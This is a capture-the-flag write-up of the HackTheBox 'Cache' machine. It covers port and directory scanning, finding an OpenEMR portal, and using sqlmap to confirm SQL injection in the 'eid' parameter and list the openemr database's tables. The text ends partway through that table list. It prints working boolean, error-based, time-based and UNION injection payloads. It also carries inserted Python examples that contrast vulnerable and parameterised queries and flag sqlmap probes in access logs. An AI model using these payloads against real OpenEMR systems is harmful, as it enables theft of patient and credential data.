Lluna's Pure land.

HTB-[cache]

0x00. Overview

0x01. Information gathering

Only ports 22 and 80 are open.

root@JIYE:~/htb/cache# nmap -sC -sV -sT 10.10.10.188 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 05:02 EDT
Nmap scan report for 10.10.10.188
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.34 seconds
root@JIYE:~/htb/cache#

0x02. Visit port 80 first

1. You can see that this is a website about hackers.

2. Clicking Author reveals that the author is ASH.

3. Trying to log in with weak credentials returns a "site under construction" page.

4. Find the functionality JS file and inspect it.

5. The username and password are found in it.

0x03. Log in

The response is still "under construction".

0x04. Edit the hosts file

1. The earlier hint says to look at ASH's other projects, such as HMS, so add a hosts entry:

10.10.10.188    hms.htb

2. Visit hms.htb

Trying to log in as ash fails; the CMS is OpenEMR.

0x05. Scan hms.htb

root@JIYE:~# dirb http://hms.htb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Oct 1 08:38:25 2020
URL_BASE: http://hms.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://hms.htb/ ----
+ http://hms.htb/admin.php (CODE:200|SIZE:937)
==> DIRECTORY: http://hms.htb/common/
==> DIRECTORY: http://hms.htb/config/
==> DIRECTORY: http://hms.htb/contrib/
==> DIRECTORY: http://hms.htb/controllers/
==> DIRECTORY: http://hms.htb/custom/
==> DIRECTORY: http://hms.htb/images/
+ http://hms.htb/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://hms.htb/interface/
==> DIRECTORY: http://hms.htb/javascript/
==> DIRECTORY: http://hms.htb/library/
+ http://hms.htb/LICENSE (CODE:200|SIZE:35147)
==> DIRECTORY: http://hms.htb/modules/
==> DIRECTORY: http://hms.htb/portal/
==> DIRECTORY: http://hms.htb/public/
+ http://hms.htb/server-status (CODE:403|SIZE:272)
==> DIRECTORY: http://hms.htb/services/
==> DIRECTORY: http://hms.htb/sites/
==> DIRECTORY: http://hms.htb/sql/
==> DIRECTORY: http://hms.htb/templates/
==> DIRECTORY: http://hms.htb/tests/
==> DIRECTORY: http://hms.htb/vendor/
......

0x06. Manual crawling finds the portal directory

A Google search shows there is a known SQL injection endpoint.

0x07. Capture the request

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=00b20ha34nukojgrtj0mvigfrk; PHPSESSID=ogdqnggoo752nheh5upb7qo5mo
Upgrade-Insecure-Requests: 1

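The captured request targets `eid`, the parameter sqlmap later reports as injectable. The following Python is an added example, not OpenEMR's code or the author's: it models the same pattern with an in-memory SQLite database (table and column names are constructed for the example; `users_secure` with `username`/`password` follows the names enumerated later in the write-up) and contrasts splicing `eid` into the SQL text with type-checking it and binding it as a parameter. The UNION payload has the same four-column shape sqlmap reports for `eid`, with `||` standing in for MySQL's `CONCAT()`.

```python
"""Vulnerable vs. parameterised lookup of a calendar event by id.

Added example, not OpenEMR's or the write-up author's code: it models
the pattern behind /portal/add_edit_event_user.php?eid=... with an
in-memory SQLite database. Table and column names are constructed for
the example; users_secure and its username/password columns follow the
names dumped later in the write-up.
"""
import sqlite3


def make_db():
    """Build a tiny constructed schema: one event row and one user row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE events (eid INTEGER, title TEXT, pid INTEGER, start_time TEXT);
        INSERT INTO events VALUES (1, 'Follow-up visit', 42, '09:00');
        CREATE TABLE users_secure (id INTEGER, username TEXT, password TEXT, salt TEXT);
        INSERT INTO users_secure VALUES (1, 'sample_user', 'hash-placeholder', 'salt-placeholder');
    """)
    return conn


def fetch_event_vulnerable(conn, eid):
    """The bug class sqlmap found: the request value is spliced into SQL text,
    so whatever follows the number becomes part of the statement."""
    sql = "SELECT eid, title, pid, start_time FROM events WHERE eid = " + eid
    return conn.execute(sql).fetchall()


def fetch_event_fixed(conn, eid):
    """Hardened form: reject anything that is not an integer id, then bind
    the value as a parameter so the driver never treats it as SQL."""
    if not eid.isdigit():
        raise ValueError("eid must be a non-negative integer")
    sql = "SELECT eid, title, pid, start_time FROM events WHERE eid = ?"
    return conn.execute(sql, (int(eid),)).fetchall()


# Same four-column UNION shape sqlmap reports for eid; SQLite uses || where
# MySQL has CONCAT(), and "-- -" comments out the rest of the original query.
UNION_PAYLOAD = (
    "1 UNION ALL SELECT NULL,NULL,username||':'||password,NULL FROM users_secure-- -"
)


def demo():
    """Return (rows leaked by the vulnerable query, whether the fix rejected it)."""
    conn = make_db()
    leaked = fetch_event_vulnerable(conn, UNION_PAYLOAD)
    try:
        fetch_event_fixed(conn, UNION_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    rows, blocked = demo()
    for row in rows:
        print(row)
    print("hardened version rejected the payload:", blocked)
```

Running the block prints the legitimate event row followed by a second row carrying `sample_user:hash-placeholder` in the title column, which is exactly how sqlmap's UNION technique smuggles other tables' data through the page's own output; the hardened function never reaches the database because the value fails the integer check.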
0x08. Exploitation with sqlmap

1. Enumerate the databases: openemr

root@JIYE:~/htb/cache# cat bp
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=00b20ha34nukojgrtj0mvigfrk; PHPSESSID=ogdqnggoo752nheh5upb7qo5mo
Upgrade-Insecure-Requests: 1
root@JIYE:~/htb/cache# sqlmap -r bp --dbs --batch
___
__H__
___ ___[,]_____ ___ ___ {1.4.9#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:53:26 /2020-10-01/

[09:53:26] [INFO] parsing HTTP request from 'bp'
[09:53:26] [INFO] testing connection to the target URL
[09:53:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[09:53:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:53:28] [INFO] testing if the target URL content is stable
[09:53:29] [INFO] target URL content is stable
[09:53:29] [INFO] testing if GET parameter 'eid' is dynamic
[09:53:29] [WARNING] GET parameter 'eid' does not appear to be dynamic
[09:53:30] [INFO] heuristic (basic) test shows that GET parameter 'eid' might be injectable (possible DBMS: 'MySQL')
[09:53:30] [INFO] testing for SQL injection on GET parameter 'eid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:53:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:53:30] [WARNING] reflective value(s) found and filtering out
[09:53:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:53:35] [INFO] GET parameter 'eid' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --not-string="row")
[09:53:35] [INFO] testing 'Generic inline queries'
[09:53:35] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:53:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:53:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:53:36] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:53:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:53:37] [INFO] GET parameter 'eid' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[09:53:37] [INFO] testing 'MySQL inline queries'
[09:53:37] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:53:37] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:53:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:53:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:53:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:53:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:53:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:53:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:53:54] [INFO] GET parameter 'eid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:53:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:53:55] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:53:56] [INFO] target URL appears to have 4 columns in query
[09:53:57] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[09:53:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[09:53:59] [INFO] fetching database names
[09:54:00] [INFO] retrieved: 'information_schema'
[09:54:00] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr

[09:54:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 09:54:00 /2020-10-01/

root@JIYE:~/htb/cache#

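Every probe in the sqlmap run above is an ordinary GET request, so it lands in the Apache access log of the hms.htb vhost. The following Python is an added detection example, not part of the write-up: it parses constructed access-log lines in combined format (addresses, timestamps and sizes are made up; the path and the payload shapes follow the sqlmap output above), URL-decodes each query parameter, and flags the error-based, time-based and UNION probe signatures together with any non-integer value for `eid`. Because `sqlmap -r` replays the headers saved in the request file, the User-Agent in the log is the browser's, so the check keys on the parameters rather than the agent string.

```python
"""Flag sqlmap-style SQL injection probes in an Apache access log.

Added example, not part of the write-up: the log lines below are
constructed (addresses, timestamps and sizes are made up); the request
path and payload shapes follow the sqlmap output in the write-up.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache "combined" log lines for the hms.htb vhost. Lines 2-4
# mirror the error-based, time-based and UNION payloads sqlmap reported.
SAMPLE_LOG = r'''
10.10.14.5 - - [01/Oct/2020:09:53:26 -0400] "GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1" 200 1423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.5 - - [01/Oct/2020:09:53:37 -0400] "GET /portal/add_edit_event_user.php?eid=1%20AND%20GTID_SUBSET%28CONCAT%280x716b6a6271%2C%28SELECT%20%28ELT%284116%3D4116%2C1%29%29%29%2C0x7170767071%29%2C4116%29 HTTP/1.1" 200 1580 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.5 - - [01/Oct/2020:09:53:54 -0400] "GET /portal/add_edit_event_user.php?eid=1%20AND%20%28SELECT%208798%20FROM%20%28SELECT%28SLEEP%285%29%29%29lAMe%29 HTTP/1.1" 200 1423 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.5 - - [01/Oct/2020:09:53:57 -0400] "GET /portal/add_edit_event_user.php?eid=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b6a6271%2C0x4f43%2C0x7170767071%29%2CNULL--%20- HTTP/1.1" 200 1601 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.10.14.7 - - [01/Oct/2020:10:01:02 -0400] "GET /portal/index.php?site=default HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
'''

# Combined log format: client, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Signatures of the techniques sqlmap reported against eid, matched on the
# decoded parameter value.
INDICATORS = [
    ("error-based (GTID_SUBSET)", re.compile(r"\bGTID_SUBSET\s*\(", re.I)),
    ("time-based (SLEEP)", re.compile(r"\bSLEEP\s*\(\s*\d+", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("boolean-based (CASE WHEN)", re.compile(r"\bCASE\s+WHEN\b", re.I)),
]

# Parameters the application treats as integer ids: any other value is
# suspicious on its own, whatever the payload looks like.
NUMERIC_PARAMS = {"eid"}


def parse_line(line):
    """Split one combined-format line into fields plus decoded query params."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl decodes once; the second unquote_plus catches double-encoded
    # values (a common evasion) without harming already-decoded text.
    rec["params"] = [(k, unquote_plus(v))
                     for k, v in parse_qsl(url.query, keep_blank_values=True)]
    return rec


def scan_log(text):
    """Return one alert dict per suspicious (request, parameter) pair."""
    alerts = []
    for line in text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in rec["params"]:
            reasons = [name for name, rx in INDICATORS if rx.search(value)]
            if key in NUMERIC_PARAMS and not value.isdigit():
                reasons.append(f"non-numeric value for integer parameter {key!r}")
            if reasons:
                alerts.append({"ip": rec["ip"], "time": rec["ts"], "path": rec["path"],
                               "param": key, "value": value, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["ip"], alert["path"], alert["param"],
              "->", "; ".join(alert["reasons"]))
```

The integer check is the part worth keeping even if the signature list ages: sqlmap's boolean-based payload for this endpoint replaces the whole `eid` value with a `SELECT (CASE WHEN ...)` expression, and any value that is not digits is already wrong for an id parameter, so the type rule catches probes the regexes were never written for.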
2. Dump the table names

root@JIYE:~/htb/cache# sqlmap -r bp -D openemr --tables --batch
___
__H__
___ ___[,]_____ ___ ___ {1.4.9#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:57:20 /2020-10-01/

[09:57:20] [INFO] parsing HTTP request from 'bp'
[09:57:20] [INFO] resuming back-end DBMS 'mysql'
[09:57:20] [INFO] testing connection to the target URL
[09:57:21] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[09:57:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[09:57:21] [INFO] fetching tables for database: 'openemr'
[09:57:22] [INFO] retrieved: 'addresses'
[09:57:22] [INFO] retrieved: 'amc_misc_data'
[09:57:22] [INFO] retrieved: 'amendments'
[09:57:23] [INFO] retrieved: 'amendments_history'
[09:57:23] [INFO] retrieved: 'ar_activity'
[09:57:23] [INFO] retrieved: 'ar_session'
[09:57:24] [INFO] retrieved: 'array'
[09:57:24] [INFO] retrieved: 'audit_details'
[09:57:24] [INFO] retrieved: 'audit_master'
[09:57:25] [INFO] retrieved: 'automatic_notification'
[09:57:25] [INFO] retrieved: 'background_services'
[09:57:25] [INFO] retrieved: 'batchcom'
[09:57:26] [INFO] retrieved: 'billing'
[09:57:26] [INFO] retrieved: 'calendar_external'
[09:57:26] [INFO] retrieved: 'categories'
[09:57:27] [INFO] retrieved: 'categories_seq'
[09:57:27] [INFO] retrieved: 'categories_to_documents'
[09:57:27] [INFO] retrieved: 'ccda'
[09:57:28] [INFO] retrieved: 'ccda_components'
[09:57:28] [INFO] retrieved: 'ccda_field_mapping'
[09:57:28] [INFO] retrieved: 'ccda_sections'
[09:57:29] [INFO] retrieved: 'ccda_table_mapping'
[09:57:29] [INFO] retrieved: 'chart_tracker'
[09:57:29] [INFO] retrieved: 'claims'
[09:57:30] [INFO] retrieved: 'clinical_plans'
[09:57:30] [INFO] retrieved: 'clinical_plans_rules'
[09:57:31] [INFO] retrieved: 'clinical_rules'
[09:57:31] [INFO] retrieved: 'clinical_rules_log'
[09:57:31] [INFO] retrieved: 'code_types'
[09:57:32] [INFO] retrieved: 'codes'
[09:57:32] [INFO] retrieved: 'codes_history'
[09:57:33] [INFO] retrieved: 'config'
[09:57:33] [INFO] retrieved: 'config_seq'
[09:57:33] [INFO] retrieved: 'customlists'
[09:57:34] [INFO] retrieved: 'dated_reminders'
[09:57:34] [INFO] retrieved: 'dated_reminders_link'
[09:57:34] [INFO] retrieved: 'direct_message_log'
[09:57:35] [INFO] retrieved: 'documents'
[09:57:35] [INFO] retrieved: 'documents_legal_categories'
[09:57:35] [INFO] retrieved: 'documents_legal_detail'
[09:57:36] [INFO] retrieved: 'documents_legal_master'
[09:57:36] [INFO] retrieved: 'drug_inventory'
[09:57:37] [INFO] retrieved: 'drug_sales'
[09:57:37] [INFO] retrieved: 'drug_templates'
[09:57:37] [INFO] retrieved: 'drugs'
[09:57:38] [INFO] retrieved: 'eligibility_response'
[09:57:38] [INFO] retrieved: 'eligibility_verification'
[09:57:38] [INFO] retrieved: 'employer_data'
[09:57:39] [INFO] retrieved: 'enc_category_map'
[09:57:39] [INFO] retrieved: 'erx_drug_paid'
[09:57:39] [INFO] retrieved: 'erx_narcotics'
[09:57:40] [INFO] retrieved: 'erx_rx_log'
[09:57:40] [INFO] retrieved: 'erx_ttl_touch'
[09:57:41] [INFO] retrieved: 'esign_signatures'
[09:57:41] [INFO] retrieved: 'extended_log'
[09:57:41] [INFO] retrieved: 'external_encounters'
[09:57:42] [INFO] retrieved: 'external_procedures'
[09:57:42] [INFO] retrieved: 'facility'
[09:57:42] [INFO] retrieved: 'facility_user_ids'
[09:57:43] [INFO] retrieved: 'fee_sheet_options'
[09:57:43] [INFO] retrieved: 'form_care_plan'
[09:57:43] [INFO] retrieved: 'form_clinical_instructions'
[09:57:44] [INFO] retrieved: 'form_dictation'
[09:57:44] [INFO] retrieved: 'form_encounter'
[09:57:44] [INFO] retrieved: 'form_eye_mag'
[09:57:45] [INFO] retrieved: 'form_eye_mag_dispense'
[09:57:45] [INFO] retrieved: 'form_eye_mag_impplan'
[09:57:46] [INFO] retrieved: 'form_eye_mag_orders'
[09:57:46] [INFO] retrieved: 'form_eye_mag_prefs'
[09:57:46] [INFO] retrieved: 'form_eye_mag_wearing'
[09:57:47] [INFO] retrieved: 'form_functional_cognitive_status'
[09:57:47] [INFO] retrieved: 'form_group_attendance'
[09:57:48] [INFO] retrieved: 'form_groups_encounter'
[09:57:48] [INFO] retrieved: 'form_misc_billing_options'
[09:57:48] [INFO] retrieved: 'form_observation'
[09:57:49] [INFO] retrieved: 'form_reviewofs'
[09:57:49] [INFO] retrieved: 'form_ros'
[09:57:50] [INFO] retrieved: 'form_soap'
[09:57:51] [INFO] retrieved: 'form_taskman'
[09:57:52] [INFO] retrieved: 'form_vitals'
[09:57:52] [INFO] retrieved: 'forms'
[09:57:52] [INFO] retrieved: 'gacl_acl'
[09:57:53] [INFO] retrieved: 'gacl_acl_sections'
[09:57:53] [INFO] retrieved: 'gacl_acl_seq'
[09:57:53] [INFO] retrieved: 'gacl_aco'
[09:57:54] [INFO] retrieved: 'gacl_aco_map'
[09:57:54] [INFO] retrieved: 'gacl_aco_sections'
[09:57:54] [INFO] retrieved: 'gacl_aco_sections_seq'
[09:57:55] [INFO] retrieved: 'gacl_aco_seq'
[09:57:55] [INFO] retrieved: 'gacl_aro'
[09:57:55] [INFO] retrieved: 'gacl_aro_groups'
[09:57:56] [INFO] retrieved: 'gacl_aro_groups_id_seq'
[09:57:56] [INFO] retrieved: 'gacl_aro_groups_map'
[09:57:56] [INFO] retrieved: 'gacl_aro_map'
[09:57:57] [INFO] retrieved: 'gacl_aro_sections'
[09:57:57] [INFO] retrieved: 'gacl_aro_sections_seq'
[09:57:57] [INFO] retrieved: 'gacl_aro_seq'
[09:57:58] [INFO] retrieved: 'gacl_axo'
[09:57:58] [INFO] retrieved: 'gacl_axo_groups'
[09:57:58] [INFO] retrieved: 'gacl_axo_groups_map'
[09:57:59] [INFO] retrieved: 'gacl_axo_map'
[09:57:59] [INFO] retrieved: 'gacl_axo_sections'
[09:58:00] [INFO] retrieved: 'gacl_groups_aro_map'
[09:58:00] [INFO] retrieved: 'gacl_groups_axo_map'
[09:58:00] [INFO] retrieved: 'gacl_phpgacl'
[09:58:01] [INFO] retrieved: 'geo_country_reference'
[09:58:01] [INFO] retrieved: 'geo_zone_reference'
[09:58:01] [INFO] retrieved: 'globals'
[09:58:02] [INFO] retrieved: 'gprelations'
[09:58:02] [INFO] retrieved: 'groups'
[09:58:02] [INFO] retrieved: 'history_data'
[09:58:03] [INFO] retrieved: 'icd10_dx_order_code'
[09:58:03] [INFO] retrieved: 'icd10_gem_dx_10_9'
[09:58:03] [INFO] retrieved: 'icd10_gem_dx_9_10'
[09:58:04] [INFO] retrieved: 'icd10_gem_pcs_10_9'
[09:58:04] [INFO] retrieved: 'icd10_gem_pcs_9_10'
[09:58:04] [INFO] retrieved: 'icd10_pcs_order_code'
[09:58:05] [INFO] retrieved: 'icd10_reimbr_dx_9_10'
[09:58:05] [INFO] retrieved: 'icd10_reimbr_pcs_9_10'
[09:58:05] [INFO] retrieved: 'icd9_dx_code'
[09:58:06] [INFO] retrieved: 'icd9_dx_long_code'
[09:58:06] [INFO] retrieved: 'icd9_sg_code'
[09:58:06] [INFO] retrieved: 'icd9_sg_long_code'
[09:58:07] [INFO] retrieved: 'immunization_observation'
[09:58:07] [INFO] retrieved: 'immunizations'
[09:58:08] [INFO] retrieved: 'insurance_companies'
[09:58:08] [INFO] retrieved: 'insurance_data'
[09:58:08] [INFO] retrieved: 'insurance_numbers'
[09:58:09] [INFO] retrieved: 'issue_encounter'
[09:58:09] [INFO] retrieved: 'issue_types'
[09:58:09] [INFO] retrieved: 'lang_constants'
[09:58:10] [INFO] retrieved: 'lang_custom'
[09:58:10] [INFO] retrieved: 'lang_definitions'
[09:58:10] [INFO] retrieved: 'lang_languages'
[09:58:11] [INFO] retrieved: 'layout_group_properties'
[09:58:11] [INFO] retrieved: 'layout_options'
[09:58:11] [INFO] retrieved: 'lbf_data'
[09:58:12] [INFO] retrieved: 'lbt_data'
[09:58:12] [INFO] retrieved: 'list_options'
[09:58:12] [INFO] retrieved: 'lists'
[09:58:13] [INFO] retrieved: 'lists_touch'
[09:58:13] [INFO] retrieved: 'log'
[09:58:14] [INFO] retrieved: 'log_comment_encrypt'
[09:58:14] [INFO] retrieved: 'log_validator'
[09:58:14] [INFO] retrieved: 'medex_icons'
[09:58:15] [INFO] retrieved: 'medex_outgoing'
[09:58:15] [INFO] retrieved: 'medex_prefs'
[09:58:15] [INFO] retrieved: 'medex_recalls'
[09:58:16] [INFO] retrieved: 'misc_address_book'
[09:58:16] [INFO] retrieved: 'module_acl_group_settings'
[09:58:16] [INFO] retrieved: 'module_acl_sections'
[09:58:17] [INFO] retrieved: 'module_acl_user_settings'
[09:58:17] [INFO] retrieved: 'module_configuration'
[09:58:17] [INFO] retrieved: 'modules'
[09:58:18] [INFO] retrieved: 'modules_hooks_settings'
[09:58:18] [INFO] retrieved: 'modules_settings'
[09:58:18] [INFO] retrieved: 'multiple_db'
[09:58:19] [INFO] retrieved: 'notes'
[09:58:19] [INFO] retrieved: 'notification_log'
[09:58:19] [INFO] retrieved: 'notification_settings'
[09:58:20] [INFO] retrieved: 'onotes'
[09:58:20] [INFO] retrieved: 'onsite_documents'
[09:58:20] [INFO] retrieved: 'onsite_mail'
[09:58:21] [INFO] retrieved: 'onsite_messages'
[09:58:21] [INFO] retrieved: 'onsite_online'
[09:58:22] [INFO] retrieved: 'onsite_portal_activity'
[09:58:22] [INFO] retrieved: 'onsite_signatures'
[09:58:22] [INFO] retrieved: 'openemr_module_vars'
[09:58:23] [INFO] retrieved: 'openemr_modules'
[09:58:23] [INFO] retrieved: 'openemr_postcalendar_categories'
[09:58:23] [INFO] retrieved: 'openemr_postcalendar_events'
[09:58:24] [INFO] retrieved: 'openemr_postcalendar_limits'
[09:58:24] [INFO] retrieved: 'openemr_postcalendar_topics'
[09:58:24] [INFO] retrieved: 'openemr_session_info'
[09:58:25] [INFO] retrieved: 'patient_access_offsite'
[09:58:25] [INFO] retrieved: 'patient_access_onsite'
[09:58:25] [INFO] retrieved: 'patient_birthday_alert'
[09:58:26] [INFO] retrieved: 'patient_data'
[09:58:26] [INFO] retrieved: 'patient_portal_menu'
[09:58:26] [INFO] retrieved: 'patient_reminders'
[09:58:27] [INFO] retrieved: 'patient_tracker'
[09:58:27] [INFO] retrieved: 'patient_tracker_element'
[09:58:27] [INFO] retrieved: 'payment_gateway_details'
[09:58:28] [INFO] retrieved: 'payments'
[09:58:28] [INFO] retrieved: 'pharmacies'
[09:58:28] [INFO] retrieved: 'phone_numbers'
[09:58:29] [INFO] retrieved: 'pma_bookmark'
[09:58:29] [INFO] retrieved: 'pma_column_info'
[09:58:29] [INFO] retrieved: 'pma_history'
[09:58:30] [INFO] retrieved: 'pma_pdf_pages'
[09:58:30] [INFO] retrieved: 'pma_relation'
[09:58:31] [INFO] retrieved: 'pma_table_coords'
[09:58:31] [INFO] retrieved: 'pma_table_info'
[09:58:31] [INFO] retrieved: 'pnotes'
[09:58:32] [INFO] retrieved: 'prescriptions'
[09:58:32] [INFO] retrieved: 'prices'
[09:58:32] [INFO] retrieved: 'procedure_answers'
[09:58:33] [INFO] retrieved: 'procedure_order'
[09:58:33] [INFO] retrieved: 'procedure_order_code'
[09:58:33] [INFO] retrieved: 'procedure_providers'
[09:58:34] [INFO] retrieved: 'procedure_questions'
[09:58:34] [INFO] retrieved: 'procedure_report'
[09:58:34] [INFO] retrieved: 'procedure_result'
[09:58:35] [INFO] retrieved: 'procedure_type'
[09:58:35] [INFO] retrieved: 'product_registration'
